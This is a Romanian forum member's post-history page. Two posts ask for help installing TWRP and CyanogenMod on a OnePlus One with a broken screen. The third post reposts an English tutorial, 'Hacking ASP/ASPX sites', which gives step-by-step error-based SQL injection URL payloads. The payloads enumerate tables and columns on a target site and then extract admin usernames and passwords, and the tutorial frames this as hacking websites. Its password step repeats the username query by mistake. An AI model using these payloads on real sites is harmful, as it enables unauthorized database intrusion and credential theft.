Jump to content

Individual14xxx

Active Members
  • Posts

    216
  • Joined

  • Last visited

Posts posted by Individual14xxx

  1. On 09.09.2016 at 10:12 AM, fallen_angel said:

    Dacă vrei să bagi CM13.1 sau CM14 îți trebuie o versiune cât mai nouă de TWRP. Am pus CM13.1 cu TWRP 2.4(sau pe acolo) și rămânea blocat la logoul Cyanogen.

    Apoi am vrut să updatez TWRP-ul din recovery și nu mai boota nici în TWRP, bucurie mare.

     

    Pornești Fastboot mode (volum up + power button) și faci ce scrie aici la Pasul 4.

    După ce ai instalat ultima versiune de TWRP, downloadezi CM13.1 de aici, îl copiezi pe telefon și apoi îi dai flash din Recovery, dar înainte de asta dai un Wipe Cache, Data, System, Dalvik.

     

    Salut , multumesc mult de raspuns , am instalat ultima versiune de TWRP prin fastboot dar nu pot copia nimic in telefon , nu stiu cum sa bag CM13.1 :( 

    Edit:Nu exista nici o solutie prin care sa instalez CM13.1 direct din pc? Comanda "fastboot flash" nu poate face asta?

    L.E : Am reusit sa instalez CM , dar acum sunt blocat in meniu "Cyanogen os welcome " , vreo sansa sa sar pasul asta? Cum spuneam telefonul are display-ul spart si nu pot folosi ecranul doar cele 3 butoane (power, volume+/-) 

  2. Salut! Mi-am amintit ca am un oneplus one spart , l-am primit de la un prieten care i-a dat factory reset dupa ce si-a distrus display-ul. Telefonul e blocat in welcome screen , butoanele sunt functionale deci pot intra in recovery mode. Nu sunt deloc familiarizat cu android, habarnam cum pot instala android de pe pc cu un usb cable . Am incercat sa copiez "twrp-2.8.6.0-bacon.img" (nu stiu daca e ce trebuie) de pe pc in internal storage-ul telefonului via usb dar nimic , in win explorer mi-a aparut ca e acolo but for some reason telefonul nu vede acel img. Cineva binedispus sa ma ajute cu un sfat , tutorial , anything?

    Sper ca m-am exprimat cat de cat bine , multumesc.

  3. Mi-sa parut util , sincer nu l-am mai vazut postat..

    Hacking ASP/ASPX sites

    ASPX injection is also similar to PHP based sql injection. But here, we don't use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.

    Step 1: Find Out A Vulnerable Link

    First, we need find out a vulnerable asp/aspx link which looks like

    www.vulnerablesite.com/gallery.aspx?id=10

    when i browse my actual link, i get the page as shown in the figure.

    f11.png

    Step 2: Checking For Vulnerability

    As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL.

    www.vulnerablesite.com/gallery.aspx?id=10'

    If it gives an error similar to the following, then our site is vulnerable to sql injection.

    ferror.png

    In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column. We will directly find out the table names,column names and then we will extract the data.

    Step 3: Finding Out The Table Names.

    www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))

    The above code executes the second query and retrieves the first table name from the database. the windows server cant convert character value into data type. so we will get an error as shown in the following figure from which we can get the first table name.

    f12.png

    But this may not be the desired table for us. So we need to find out the next table name in the database.

    For that, we will use the following query.

    www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name')))

    replace the first_table_name with the actual table name we got above.

    f18.png

    Now we will get the second table name as shown in the figure. Still if we don't get our desired table, we will continue the procedure until we get the desired table name. Now the query looks like

    www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name','second_table_name')))

    Replace first_table_name and second_table_name with the table names we got in the above steps.

    f13.png

    Step 4: Finding Out The Columns

    Now we got the admin table. So we need to find out the columns now.

    www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table'))

    Replace admin_table with the table name we got. In our case, it is "vw_system_admin"

    f14.png

    If the first column is not related to our desired column names, then follow the steps as we have done in step 3.

    www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table' and column_name not in ('first_column_name')))

    Replace first_column_name with the column name we got.

    f15.png

    f16.png

    Step 5:Extracting The Data

    After finding out all the columns, we need to extract the data such as user names and passwords.

    For that, we use the following query

    For user name,

    www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

    f17.png

    For password,

    www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

    f17.png

    Sursa: Hacking ASP/ASPX Websites - SQL Injecton Part 6 | 101hacker

    LE: Multumesc Maximus.

×
×
  • Create New...